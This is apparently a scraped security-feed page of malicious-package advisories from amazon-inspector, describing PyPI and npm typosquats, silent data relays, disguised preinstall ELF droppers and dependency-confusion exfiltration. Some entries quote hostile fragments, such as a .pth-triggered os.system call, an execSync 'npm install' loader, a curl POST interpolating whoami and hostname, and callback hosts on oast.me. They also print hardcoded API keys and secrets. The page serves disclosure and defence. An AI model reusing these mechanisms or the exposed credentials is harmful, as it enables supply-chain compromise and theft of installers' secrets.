| Risiko / Label | Veröffentlichung | |
|---|---|---|
| Risiko ? / 10 MAL-2026-4775 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (ec852c69947e2a2575ae37ce4a442a67dc01f7328c0c603b94c87aa84803623f) wdt-erpmcp advertises itself as a generic MCP wrapper over the caller's Wangdian Tongda (WDT) ERP, and three of its four tools correctly read WDT_APPKEY / WDT_APPSECRET / WDT_SID from the environment. The fourth tool, erp_purchase_order_push, deviates from that pattern: in wdt_erpmcp/erp_service.py lines 79-83, it instantiates `WdtClient('ruoxi2-otc', 'e3c96189b699db691e48ef61070e151f', 'ruoxi2', 'https://api.wangdian.cn/openapi2/')` with hardcoded credentials. Any caller invoking this tool submits supplier, warehouse, SKU, and price data into the author-controlled `ruoxi2` WDT tenant rather than their own — the caller's purchase-order data is silently relayed to a fixed third-party account they did not configure, and the author gains the ability to observe or fabricate orders bearing caller-supplied data. The hardcoded WDT app secret is also extractable from the source, allowing any installer to call api.wangdian.cn as that tenant. The asymmetry between the three env-var-driven tools and the one hardcoded tool, together with the silent destination override, fits the silent-relay pattern. | ||
| Risiko ? / 10 MAL-2026-4770 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (bb61035c28fe642903fac1b2776b2593c1611831ce5553e63ef8b09a77e414c9) The package installs a `suspicious-demo.pth` file into site-packages via setup.py's `data_files=[("", ["suspicious-demo.pth"])]`. Python auto-processes.pth files at every interpreter startup, and this one contains `import spip_pth_demo_marker`, whose module body is `import os; os.system("calc.exe")`. The result: every invocation of `python` on a host that has installed this package executes an OS command via the shell, with no user action required beyond installation. The README explicitly states the marker module 'only writes a benign marker line to stderr' and 'does not launch processes or run OS commands' — the shipped code directly contradicts this. While the specific argv (`calc.exe`) is innocuous on Windows and a no-op elsewhere, the mechanism is a fully functional persistent code-execution surface in the installer's Python environment; substituting any other command turns this into arbitrary RCE on every Python launch..pth-based execution is particularly dangerous because it bypasses install-phase analysis and fires on every subsequent interpreter start, including in unrelated projects sharing the same environment. | ||
| Risiko ? / 10 MAL-2026-4768 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (1495d93dccc77a422f70d192ef4d8dcd53b0c990fff43e68bc2a0eca301e5d10) Package name 'sklern' is a one-character deletion from the top-tier ML package 'sklearn', and its public API (linear_regression, logistic_regression, decision_tree, perceptron, mlp, etc.) mimics sklearn's surface but the functions do not implement ML — they print code strings. On `import sklern`, src/sklern/__init__.py loads src/sklern/ai_helper.py, which at module top level instantiates a Groq client with a hardcoded API key (`Groq(api_key="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")`). The exported `get1(prompt)` function — re-exported in `__all__` — sends the caller's prompt to api.groq.com using that hardcoded key, with no mechanism for the caller to override the destination or credential. PKG-INFO description is the placeholder 'Example PyPI package' and README references 'sample_package'. A developer who mistypes 'sklearn' as 'sklern' installs a package that (a) does not provide the ML functionality its API names suggest, (b) ships a live third-party credential that any installer can extract and abuse against api.groq.com, and (c) silently relays caller-supplied prompt data through the author's Groq account where it may be logged. The combination of name-confusion attack + credential distribution + silent-relay of caller data is the typosquat-with-payload pattern. | ||
| Risiko ? / 10 MAL-2026-4766 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (0142a19ba91410cc19470321caba04aa48633df937b0ed66439cccf31877a333) utils/send_email_otp.py exposes otpEmailService(to_email, email_body), which authenticates to smtp.gmail.com using a hardcoded sender address (magizhchisk@gmail.com) and a hardcoded Gmail App Password, then calls server.send_message on a message whose From: is the author and To: is the caller-supplied recipient with caller-supplied body. Any application that imports this helper sends OTP/notification email FROM the author's personal Gmail account through author-controlled infrastructure, with no way for the caller to supply their own SMTP credentials. The recipient address and message body — installer-side data — are silently routed through the author's mailbox. Additionally, the App Password is redistributed to every installer, so anyone who installs the package can log into the author's Gmail and impersonate the sender to all prior OTP recipients. A secondary issue in utils/auth.py hardcodes SECRET_KEY = "nsn" for HS256 JWT signing; any deployment using create_access_token/verify_token from this library will issue forgeable tokens since the signing key is shipped publicly. | ||
| Risiko ? / 10 MAL-2026-4765 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (bee34269c7f3aae4181b856b9b73a57abf59acc94d076d51b4fb6c14b8fc5508) This release of qontract-reconcile uses uv's `[[tool.uv.dependency-metadata]]` mechanism in pyproject.toml to override the `pagerduty` package's declared dependencies and inject `httpxyz>=0.31` — a typosquat of the widely-used `httpx` HTTP client. Every legitimate `import httpx` reference in the source tree has been mechanically rewritten to `import httpxyz`, including string literals inside comments and logger names (e.g., `reconcile/utils/runtime/environment.py` contains `# hide logging.info "HTTP GET/POST..." logs from httpxyz` and `logging.getLogger("httpxyz").setLevel(logging.WARNING)`; `reconcile/utils/runtime/integration.py` and `reconcile/ldap_users_api/integration.py` declare `import httpxyz` at module top with `httpxyz.HTTPStatusError` / `httpxyz.Response` API references matching httpx's surface). The uniform find-and-replace across import statements, type annotations, comments, and logger-name strings is the fingerprint of an attacker rewriting a stolen source tree before republishing — not a legitimate fork. Installer impact: running the documented `uv sync` install path resolves the `httpxyz` package from PyPI into the environment; on import of the affected modules, the typosquat's code runs in-process with whatever credentials qontract-reconcile is configured with (Vault tokens, AWS credentials, GitLab tokens, Kubernetes service-account tokens — qontract-reconcile is a Red Hat AppSRE reconciler with broad cloud/secret access). The typosquat package's code was not inspected here, but namespace-hijacking a credential-heavy reconciler's HTTP client is a high-value supply-chain attack pattern. | ||
| Risiko ? / 10 MAL-2026-4763 | vor 6 Stunde(n) | |
|
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (08bbc8be2cfa9a85473b0287e3c327b16c3f9e15886869bd9e2188a323448fd9)
Package `pulumi_vcd` is published with metadata mimicking an official Pulumi SDK (Homepage `https://www.pulumi.com`, tfgen-style auto-generated bindings) but `pulumi_vcd/_utilities.py` and `pulumi_vcd/pulumi-plugin.json` set the provider plugin server to `github://api.github.com/ergSey/pulumi-vcd` — a personal GitHub user's repository, not the `pulumi/` organization that publishes legitimate providers. When a developer who installs this SDK runs `pulumi up`, the Pulumi engine fetches and executes the native provider plugin binary from this personal repo with no hash or signature verification. Whoever controls that GitHub account can ship arbitrary native code to anyone using the SDK. Supporting context: the version string is a unix-timestamp alpha (`3.0.0a1779455998`), the README links VCD to `http://example.com`, and the package is auto-generated tfgen output — consistent with a quickly-staged namespace impersonation rather than an established community provider. Legitimate Pulumi SDKs point their plugin server at `github://api.github.com/pulumi/ |
||
| Risiko ? / 10 MAL-2026-4762 | vor 6 Stunde(n) | |
|
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e7c9cfd90d6de2acd86d50019dfa4a2b140ac9246fdcbae8d7aaa3d17bd4af6e)
The distribution is published as `pgrayy-wasmtime` but its `top_level.txt` declares the top-level import name as `wasmtime`, and the entire Python source tree under `wasmtime/` (`__init__.py`, `_ffi.py`, `_bindings.py`, `component/*`) is a verbatim copy of the official Bytecode Alliance `wasmtime-py` distribution, complete with upstream metadata (`Author-email: The Wasmtime Project Developers |
||
| Risiko ? / 10 MAL-2026-4759 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (709b1f2440fa3288d47076cddc5ffe20122619c07c346265459e3555a226c92e) pyproject.toml lists `fuzy-jon==0.1.0` in both `[build-system].requires` and the runtime `dependencies`, while the package's own code imports the real `fuzzy_json` (notebook_intelligence/api.py line 9: `from fuzzy_json import loads as fuzzy_json_loads`). `fuzy-jon` is a name-squat of the legitimate `fuzzy-json` PyPI package (drops a 'z'/'s'). Installing this version causes pip to resolve and execute whatever code the owner of `fuzy-jon` publishes — both at PEP-517 wheel build time (build-system requires) and at `import notebook_intelligence` (runtime dependency satisfied, but the actual `from fuzzy_json import...` line triggers installation/resolution of `fuzzy_json` separately, while `fuzy-jon` is silently pulled into the environment). The mismatch between the imported module name and the pinned distribution name is the classic dependency-confusion / typosquat-injection shape — the import statement uses the real package, but the manifest hard-pins a lookalike that the legitimate maintainer would have no reason to declare. Whoever controls `fuzy-jon` on PyPI gains code execution on every installer's machine. | ||
| Risiko ? / 10 MAL-2026-4758 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (93ea83117b0ae362a2b55ad581d69b3600c81b78d2e90c19bb1ea9eea2266a4c) The package's documented `NebulixEngine.chat()` API hardcodes two Firebase Realtime Database URLs owned by the author (fcmm-48870-default-rtdb.firebaseio.com and tappu-76693-default-rtdb.firebaseio.com) as the destination for caller-supplied data. On engine instantiation the user-provided `auth_token` is sent to the author's auth database; during `chat()`, `session['history']` (last 50 user queries), `user_name`, and `custom_knowledge` are written via `requests.put` to the author's database keyed by the user's token (nebulix/engine.py lines 33-38 and 472). Any developer integrating this library silently exfiltrates their end users' chat content, names, and custom knowledge entries to the author's Firebase project. The behavior is not disclosed in README or package metadata, and the destination is not configurable — it is the canonical silent-relay shape, where normal use of the advertised API leaks caller data to a hardcoded third-party endpoint. Two embedded Firebase Web API keys are public-by-design identifiers (not credentials) and are noted only as corroborating context that the author's database is the relay target. | ||
| Risiko ? / 10 MAL-2026-4757 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (37c27d25a4c203cbb89156281fbacc7feb424a09eaa296f7c3dedff860891f1f) morin/common.py hardcodes an HTTP proxy at 191.102.147.15:8000 with embedded credentials (`proxies = {'https': 'http://5TUMV6:sq3suS@191.102.147.15:8000'}`) and unconditionally routes all Telegram API calls through it via `requests.get(url, params=params, proxies=proxies, timeout=15)` where `url=https://api.telegram.org/bot{bot_token}/sendMessage`. Every Clickhouse/connector class in the package funnels through `Common.log_func` / `Common.send_logs`, so any caller using the package's notification feature ends up tunneling their Telegram bot_token (carried in the URL path) and log message content through this third-party host. The proxy is not the publisher's documented infrastructure, is not mentioned in the package documentation, and the operator of 191.102.147.15:8000 can observe and tamper with the CONNECT-tunneled traffic — including capturing the bearer bot tokens. This is the silent-relay shape: a public API quietly redirects caller-supplied secrets through an attacker-or-third-party-controlled destination. | ||
| Risiko ? / 10 MAL-2026-4755 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (268eeb8db2d704a5b34b2007a25477fdd9f2de3525462f3dd78192aa5d2f95a1) Package metadata advertises mathepy as a 'Module for Quick Calculations', but the package's importable __init__.py exposes ~13 top-level functions (ask_llm, pink, america, iran, momo, dropnull, code, sf, abc, liti, bcd, lc, init, koko) whose bodies each construct a Groq client with a hardcoded gsk_* API key and forward the caller-supplied prompt argument to api.groq.com's chat-completions endpoint. For example, src/mathepy/ai_helper.py:4 instantiates `Groq(api_key="gsk_m7BJ...")` and ask_llm posts the caller's `prompt` to `client.chat.completions.create`; analogous code is present in pink.py, america.py, iran.py, momo.py, dropnull.py, code.py, sf.py, abc.py, liti.py, bcd.py, lc.py, koko.py, and init.py, each with a distinct hardcoded gsk_* key. Callers have no way to opt out, the destination is unconfigurable, and the README does not disclose that input is sent to a third-party LLM service. Any developer who imports mathepy and invokes one of these functions silently routes their inputs through the author's Groq account. This is the silent-relay supply-chain shape: a package's advertised API hides a hardcoded outbound destination that exfiltrates caller-supplied data. The hardcoded keys themselves are author-self-harm (anyone can extract and burn the author's Groq quota), but the relay channel they enable is the installer-facing harm. | ||
| Risiko ? / 10 MAL-2026-4751 | vor 6 Stunde(n) | |
|
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (df79336313f71fac8158ff6f3e0160d0e99a8d1d84c452505fd3739af5838a69)
glass_of_water/__init__.py embeds 10 Google Gemini API keys (AIzaSy...) split across 5-part dictionaries and reassembled at runtime by _get_api_key() (L6-19). The split-and-reassemble pattern is a deliberate evasion of registry/secret scanners. The exported water(prompt,...) function unconditionally instantiates `genai.Client(api_key=api_key)` and calls `client.models.generate_content(model='gemini-flash-latest', contents=system_instruction + prompt)` (L36-41) — there is no env-var override or opt-in path for caller-supplied credentials. Two installer-relevant harms result: (1) live third-party credentials are redistributed to every installer, who can extract and abuse them against Google's Gemini API; (2) any caller of water() silently routes their prompt content to a Google project owned by the author, where it is billed and logged under the author's account. Author metadata is placeholder (`Your Name |
||
| Risiko ? / 10 MAL-2026-4749 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (677eed2b8b2630ec8e88b29d7ae3d9d49fc0d0c18230cc51b24d8102cdb151ee) Every advertised function in this package (ask_llm, pink, america, iran, momo, abc, bcd, code, sf, liti, koko, init, dropnull, hellp, lc) instantiates a Groq client using a hardcoded `gsk_...` API key owned by the package author and forwards the caller-supplied `prompt` argument to api.groq.com via `client.chat.completions.create`. Callers cannot supply their own key; the public API has no parameter or env-var override. As a result, any prompt content passed into these functions — which may contain proprietary data, customer input, or secrets — is routed through the author's Groq account, where the author can read it via their dashboard. 17 distinct hardcoded Groq keys are shipped across ai_helper.py, abc.py, america.py, bcd.py, code.py, dropnull.py, hellp.py, init.py, iran.py, koko.py, lc.py, liti.py, momo.py, pink.py, and sf.py. The package metadata reinforces the assessment: README references an unrelated `sample_package` with `add`/`greet` examples that don't exist in the source, the package and module names are nonsensical, and there is no documented legitimate purpose for the relay. | ||
| Risiko ? / 10 MAL-2026-4748 | vor 6 Stunde(n) | |
|
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (1d53e4571f8ccfc385a265dfd47cbea9793946762a794aff432e98614ee10b21)
The package ships epl/.ai_config.json containing a hardcoded Groq API key with provider set to 'groq'. On any AI-related CLI invocation (`epl ai`, `epl gen`, `epl explain |
||
| Risiko ? / 10 MAL-2026-4747 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c151a181047e12f1de0e91b1923861446b04558028d518e30df1767ccc85def7) At `pip install` time, setup.py reads the `EDISON_QUERY` environment variable from the installer's environment and POSTs it to `https://edison-k8.vercel.app/query`, an author-controlled Vercel endpoint that proxies requests to Google Gemini. The HTTP response is written verbatim into `edison_tools/data.py` and exposed through the package's public `query()` API. Two distinct installer-side harms: (1) install-time outbound network with no opt-in, carrying any value the user has placed in `EDISON_QUERY` to the author's infrastructure; (2) the advertised `query()` function silently relays caller-supplied prompts through the author's hardcoded Vercel endpoint, meaning every consumer of the API funnels their queries (and any sensitive content therein) through the author's account, where they can be logged or modified. The destination, model selection, and account credentials are not configurable — the relay is the package's only mechanism. This matches the silent-relay pattern: normal use of the documented API leaks caller-supplied data to a hardcoded third-party destination. | ||
| Risiko ? / 10 MAL-2026-4746 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (4324181416ad15727c0f51a30b56858c42fad99b93635922494acfe4c0f5d597) Package 'crw' impersonates the Firecrawl SDK: it declares 'firecrawl' as a keyword, replicates Firecrawl's client surface (CrwClient.scrape/crawl/map/search), and documents 'fc-'-prefixed API keys mirroring Firecrawl's token format. The client's default API endpoint is https://fastcrw.com/api — a lookalike of firecrawl.com — to which the public API methods send caller-supplied URLs, scrape targets, search queries, and the 'fc-' API keys the SDK invites users to paste in. Publisher metadata is placeholder-shaped ('us/crw' on GitHub, homepage us.github.io/crw), inconsistent with a legitimate Firecrawl-compatible client. Additionally, src/crw/_binary.py fetches a platform binary from github.com/us/crw/releases/latest (mutable 'latest' tag, no hash/signature verification) and src/crw/__main__.py hands it to os.execvp when the user runs the CLI or constructs CrwClient in subprocess mode — an unpinned dropper from the same placeholder publisher. Installer harm: any developer who installs this expecting a Firecrawl SDK leaks their scraping targets and Firecrawl-shape API keys to fastcrw.com, and runs an unverified binary downloaded from a placeholder GitHub repository. | ||
| Risiko ? / 10 MAL-2026-4744 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (5cfe9b8e5b4fc182dbef3ccc501998bbc412673e03db0c4cca6d251ea3c689af) simple_agent/cli.py defines an undocumented command literal 'NZXNB' that, when entered at the chat prompt, invokes chat_flow(quick_mode=True). In quick mode the user's saved configuration is bypassed and an embedded _QUICK_CONFIG is used instead: api_url="http://api.polingkey.com:8000/v1/chat/completions", api_key="1", model="GLM-5". Any prompt the user types after triggering this hidden command is POSTed in cleartext to api.polingkey.com:8000, an author-controlled host not mentioned in the README, which only advertises deploy/chat/exit. Users who trigger the command (knowingly or by accident) silently leak their chat content — including any sensitive context they paste — to the package author over an unencrypted channel. The hidden trigger string and the divergence from the documented configurable-endpoint behavior rule out a benign feature flag. | ||
| Risiko ? / 10 MAL-2026-4743 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (6f4ae4b8c00d27e82d54a5d2d960b1dc4f40ba15bc938355bad8421c338d6ef6) buddyme advertises a CLI agent. When installed and run, the default REPL routes every prompt the user types to third-party LLM providers (Zhipu GLM at open.bigmodel.cn, DeepSeek, Baidu ERNIE, Aliyun Qwen, Xiaomi Mimo) using API keys hardcoded in buddyMe/llm_moudle/model_config.py. The default tool registration also includes BaiduSearchTool, which carries a hardcoded Baidu Qianfan API key (DEFAULT_API_KEY in buddyMe/tool_moudle/baidu_search_tool.py) and POSTs every agent-issued search query to qianfan.baidubce.com/v2/ai_search/web_search under the author's account. Users supply no key, receive no disclosure, and cannot tell that their prompts and search terms are visible to the author's vendor accounts and billed to those accounts. The hardcoded destination + caller-supplied content flowing to it is the silent-relay shape: installers running the documented CLI have their inputs and search queries silently relayed to author-controlled third-party endpoints. Seven live third-party API keys are also embedded in importable source, allowing any installer to extract and abuse the author's paid quotas — a secondary concern below the silent-relay primary. | ||
| Risiko ? / 10 MAL-2026-4740 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (370d1632254cb5b5dbd394992054b6c0e943a6fb758ab70f470c059ee734b9c0) The package is published as 'zod-to-js' but ships a copy of pino's source tree (main entry `pino.js`, lib/proto.js, lib/levels.js, pino docs/README) with a description copy-pasted from inquirer and homepage `https://getpino.io` — a deceptive identity unrelated to its declared name. On `require('zod-to-js')`, the load chain reaches `lib/writer.js`, which attempts `require('modustack')` and, on failure, executes `execSync('npm install modustack --no-warnings --no-save --no-progress --loglevel silent', { windowsHide: true })` followed by `require('../../modustack/pino.js')`. The install is unpinned, has no integrity check, and runs whatever bytes the attacker currently publishes under the `modustack` name. The same file contains additional staging scaffolding — a `String.fromCharCode`-based string builder and a `getMacAddress()` helper that enumerates non-internal interface MACs but is unreferenced in the visible code path — consistent with a loader/dropper shaped for evasion. Any consumer that imports this package triggers attacker-controlled code execution on the installer's machine. | ||
| Risiko ? / 10 MAL-2026-4738 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c9081ad708b658c1bd56299e401ca6a764cc9137d99573bc922d38a7381cc30d) On `npm install`, postinstall.js collects host identity and environment data (os.hostname(), username, process.cwd(), process.env values, plus shelled-out `whoami`/`hostname`/`id` via child_process.execSync) and ships it over the network. Outbound destinations include `https://app.interactsh.com` (an out-of-band interaction service commonly used for blind-exfiltration / SSRF beacons) and `http://lululemon.jfrog.io` (a JFrog endpoint referenced by hardcoded URL — consistent with a dependency-confusion attack targeting Lululemon's internal package namespace). Collected data is base64-encoded (Buffer.from(...).toString('base64')) before transmission via https.request. index.js additionally constructs a `curl -X POST` command interpolating `$(whoami)`, `$(hostname)`, and `id` and runs it via child_process.exec. The `99.9.0` version number combined with the lululemon.jfrog.io reference is the canonical dependency-confusion fingerprint: publish a public package with a name matching an internal one and a high version to win resolution. Installer harm: identity, environment variables, working-directory contents, and internal-network reachability data are leaked to attacker-controlled infrastructure on every install. | ||
| Risiko ? / 10 MAL-2026-4735 | vor 6 Stunde(n) | |
|
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5f9025a3fddb0d31a5cd9114850b0ca859acf96e54649d4d2a9fe286b7ca015c)
xy-ai-chat ships a Lit web component ( |
||
| Risiko ? / 10 MAL-2026-4731 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (46afe229d6efe1ef10d025302ed21e5c2c44bdd772c8fbb28d037cb1215c84ba) wml-core@99.0.1 is a dependency-confusion package targeting an internal `wml-*` namespace, published with an inflated version (99.0.1) to win npm resolution against an internal package of the same name. The `preinstall` script `poc.js` runs automatically on `npm install` and harvests: hostname, username, OS/platform info, full network configuration (`ipconfig /all` on Windows or `ip a` + `/etc/resolv.conf` on Linux), `whoami /all` / `id` output, git remote URLs, the parent project's `package.json`, CI configuration files (`.gitlab-ci.yml`, `.github/workflows/*`, `Jenkinsfile`, `azure-pipelines.yml`), and a filtered dump of `process.env` matching credential-bearing prefixes including `TOKEN`, `AWS`, `AZURE`, `NPM`, `GITHUB`, `GITLAB`, `JENKINS`, `WALMART`, `WMT`, `CI_`. The collected JSON blob is POSTed to `d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me` (an Interactsh out-of-band callback host) over HTTPS, with a DNS callback emitted as a side channel. Any installer outside the intended target scope — including unintended internal builds and any third party who installs this name — has their build environment, CI secrets, and cloud/registry tokens exfiltrated. The package's self-description as 'authorized bug bounty research' does not change installer-side harm: the payload fires unconditionally on any `npm install`. | ||
| Risiko ? / 10 MAL-2026-4730 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (d65cdf836cae85d721f6a982c5941bd18037d4a3554ec4b69cd5828591ee0e20) wml-components@99.0.1 declares `preinstall: node poc.js` in package.json, so `npm install` automatically runs poc.js with no consent step. poc.js iterates `process.env` and captures every variable whose name matches credential-shaped prefixes (TOKEN, AWS, AZURE, NPM, GITHUB, GITLAB, CI_, JENKINS, WALMART, WMT, BUILD, PROJECT, REPO, etc.) with full values, runs host-recon commands (`ip a`/`ipconfig /all`, `id`/`whoami /all`, `os.hostname()`, `os.platform()`), and walks up the directory tree reading the parent project's package.json and CI configuration (`.gitlab-ci.yml`, `.github/workflows`, `Jenkinsfile`, `azure-pipelines.yml`). The collected bundle is POSTed over HTTPS to a hardcoded interactsh out-of-band callback host (`d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me`, poc.js:11 and poc.js:113). The package's `main` is an empty object — it provides no functionality and exists only to execute the exfiltration payload. The name and version (`wml-components@99.0.1`) are shaped as a dependency-confusion lure against an internal Walmart `wml-*` namespace, with the high version number designed to win resolution over the legitimate internal package. Although the package description claims authorized bug-bounty testing, any developer or CI system outside the intended scope that resolves this name (mistyped dependency, public-mirror automation, untargeted CI) leaks credentials, source-tree metadata, and host identifiers to the attacker-controlled OAST endpoint. | ||
| Risiko ? / 10 MAL-2026-4729 | vor 6 Stunde(n) | |
|
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (ae14bab8e5a11636f7a395fccf88119f5294c3639c8f71b6b2e3f199282bb584)
On `npm install`, scripts/postinstall.js fetches a `companion- |
||
| Risiko ? / 10 MAL-2026-4719 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (3992f423f88c69e8c00223cc0ef81f970b8e178f1854beb00ef443586302ad89) package.json declares `"preinstall": "./bin/install-deps"`, which runs a 976KB UPX-packed Linux x86 ELF binary on every `npm install`. The package self-describes as a pure-JavaScript 'Web Client for WeaveDB' — its index.js is a ~60-line HTTP wrapper around `https://${functionId}.exm.run` — with no native build step, no shipped C/C++/Rust source, and no purpose-aligned reason to ship or execute a Linux binary at install time. The binary carries the UPX runtime-unpacker signature (`http://upx.sf.net` at offset ~4574) so its actual payload is compressed and not statically reviewable; visible string fragments reference PTRACE (process tracing), libbpf (kernel packet filtering), HTTP client primitives, and GitHub API headers — capabilities entirely unrelated to a WeaveDB JS HTTP client. There is no hash/signature verification, no version pinning, no documentation of the binary's presence in the README, and the file is staged under a generic 'install-deps' cover name. Installer impact: any `npm install weavedb-exm-sdk-web` on a Linux host (developer machines, CI runners) executes attacker-controlled, process-privileged native code with capabilities (ptrace, eBPF) suitable for credential theft, process injection, and host-level surveillance, before any application code is loaded. | ||
| Risiko ? / 10 MAL-2026-4718 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (78ab05b11a1c784b066c89ffaff7bdf3a3351c611818e1d310cf718a64f20aec) package.json declares `"preinstall": "./vendor/setup"`, causing every `npm install weavedb-exm-sdk` to execute vendor/setup — a 976,568-byte Linux x86 ELF that is UPX-packed (the `http://upx.sf.net` self-decompressor banner is present at offset ~4574). The package's advertised purpose is a pure-JS WeaveDB/EXM SDK that wraps @execution-machine/sdk, arweave, and ramda; the source tree contains no native code, no binding.gyp, no node-gyp build, and no documented reason to ship a Linux native binary. Strings recovered from the binary's tail include `LIBBPF`, `PTRACE`, `NETLINK`, `HTTP/1.1`, `POST`, `https://`, and `USERPROFILE` — capabilities (eBPF/ptrace/network) that a JavaScript SDK has no need for. UPX packing of an install-time payload is an intentional anti-analysis measure: the executable bytes are not auditable from the source tree. This is a textbook opaque-binary dropper at preinstall time — the installer runs attacker-controlled native code on every `npm install`, with no hash verification, no purpose match, and no transparency. | ||
| Risiko ? / 10 MAL-2026-4717 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (9cb1233d729c7aefcbe9024196bb4af52f78854aa5ed7f46afb4fa9cd59918c1) package.json declares `"preinstall": "./src/compiler/native"`, which auto-executes a 976 KB stripped Linux ELF binary on every `npm install`. The binary is undocumented — no source is shipped, no README mention, and no JavaScript code in the package references it. Extracted strings show system-introspection capabilities (libbpf/eBPF, ptrace, netlink-diag), cryptographic primitives (RSA, Ed25519, MLKEM), an HTTP/1.1 client, GitHub REST API references (`api.github.com`, version header `2022-11-28`), `XMLHttpRequest`, and `USERPROFILE` — a system-introspection plus networking surface entirely inconsistent with the package's stated purpose (a Next.js admin console for WeaveDB, which requires no native compilation step). The binary is stripped and cannot be inspected before npm runs it. Installer harm: arbitrary attacker-controlled native code runs with the installer's privileges on `npm install`, with surface area (eBPF/ptrace) suggesting credential and process-memory access, and outbound HTTP/GitHub-API capability for exfiltration or further payload retrieval. | ||
| Risiko ? / 10 MAL-2026-4714 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (05323f987b64131618be124040867a2acb216aef96952a6a3dfc11c615501500) package.json declares `"preinstall": "./dist/runtime.node"`, causing npm to spawn the shipped file as an executable on every install on Linux. Despite the `.node` extension (which would normally indicate a Node-API addon loaded via `require()`), the file is a 976KB stripped/packed ELF binary, not a native addon — Node addons are never spawned as processes. The binary contains strings indicating network I/O (HTTP/1.1, POST, https://), host enumeration (USERPROFILE, /lib64, linux-x86), kernel/eBPF and ptrace primitives (LIBBPF_0.0, PTRACE), and modern crypto (RSA/Ed25519/X448/MLKEM), with packed/obfuscated fragments. The package ships no source, no binding.gyp, no node-gyp/prebuild-install/node-pre-gyp scaffolding, no checksum, and no version-pinned publisher-hosted release URL — none of the legitimate native-addon shape. The `.node` filename is a deliberate disguise to make the executable look like a benign addon. Any developer or CI system running `npm install wdb-sdk` on Linux executes this attacker-controlled binary with the installer's privileges. | ||
| Risiko ? / 10 MAL-2026-4711 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (f809db41305575dc4eeed6726bdc75000e7f083dee4599ad71fd7b5eb89b2501) package.json declares "preinstall": "./src/deps.ts", but src/deps.ts is not TypeScript — it is a 976KB Linux x86-64 ELF executable (magic bytes \x7fELF\x02\x01\x01, sha256 36abd242ddaa27f0160c539377a0e92cf781c1695137850acc87e3892b436d36). On `npm install` on Linux, the lifecycle hook execs this native binary directly, running attacker-controlled code on the installer's machine before any JS is loaded. The.ts extension is a deliberate disguise to evade casual review. Strings inside the binary include LIBBPF_0.0, PTRACE, HTTP/1.1, https://, POST, USERPROFILE, and PuTTY/Ed25519/RSA key references — consistent with an eBPF-/ptrace-capable credential-harvesting implant with outbound HTTPS exfiltration, not any kind of dependency setup. The 0.41.2 tarball additionally smuggles an undeclared 12.5MB wao-0.41.1.tgz at the package root, providing an opaque secondary payload channel layered on top of the disguised preinstall binary. No legitimate engineering use case exists for shipping an ELF as deps.ts and exec'ing it from a preinstall hook. | ||
| Risiko ? / 10 MAL-2026-4710 | vor 6 Stunde(n) | |
| --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (e6bfb508fa412e49b249eaf5529f175ebb14f0e7d9fe19a119e8cc9acf25505a) Package declares `preinstall: node poc.js`, which on `npm install` collects host identity (os.hostname, whoami/id, ipconfig/ip a output), scrapes environment variables matching credential-shaped prefixes (TOKEN, AWS, AZURE, NPM, GITHUB, GITLAB, JENKINS, CI_, WALMART, WMT), reads the parent project's package.json and CI configuration files (.gitlab-ci.yml,.github/workflows, Jenkinsfile), and HTTPS POSTs the aggregated JSON to a hardcoded interactsh OOB endpoint at d8a5d9pon5bugoc35cngp9hcregcqyezu.oast.me, plus a DNS callback with a hex-encoded hostname/username. The package is published at version 99.0.1 with a self-described 'Dependency Confusion PoC' purpose targeting Walmart's internal `walmart-shared-modules` namespace, intended to win npm's highest-version-wins resolution. Any installer outside Walmart's authorized testing scope still suffers full environment and CI-secret exfiltration; self-declared 'security research' framing does not neutralize the harm to unrelated installers. | ||
| 05.05.2026 - Cushman & Wakefield | 310.431 Datensätze geleaked | |
